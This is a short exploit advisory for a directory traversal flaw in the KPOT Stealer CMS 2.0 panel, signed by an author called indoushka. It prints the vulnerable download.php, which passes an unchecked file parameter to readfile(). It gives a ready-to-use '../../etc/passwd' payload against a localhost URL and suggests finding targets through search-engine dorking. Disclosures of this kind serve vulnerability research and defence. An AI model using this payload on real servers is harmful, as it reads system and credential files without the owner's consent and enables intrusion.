Headline
KPOT Stealer CMS 2.0 Directory Traversal
KPOT Stealer CMS 2.0 suffers from a directory traversal vulnerability.
====================================================================================================================================| # Title : KPOT Stealer CMS v2.0 Directory Traversal Vulnerability || # Author : indoushka || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) || # Vendor : https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/kpot2/KPOT.md | ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] onfected file: download.php <?php if (isset($_GET['file'])) { $file = $_GET['file']; header('Content-Disposition: attachment; filename="'.basename($file).'"'); header('Content-Length: ' . filesize($file)); readfile($file); } ?>[+] use payload : download.php?file=../../../../../../../../../etc/passwd[+] http://127.0.0.1/KPOT/download.php?file=../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |=======================================================================================================================================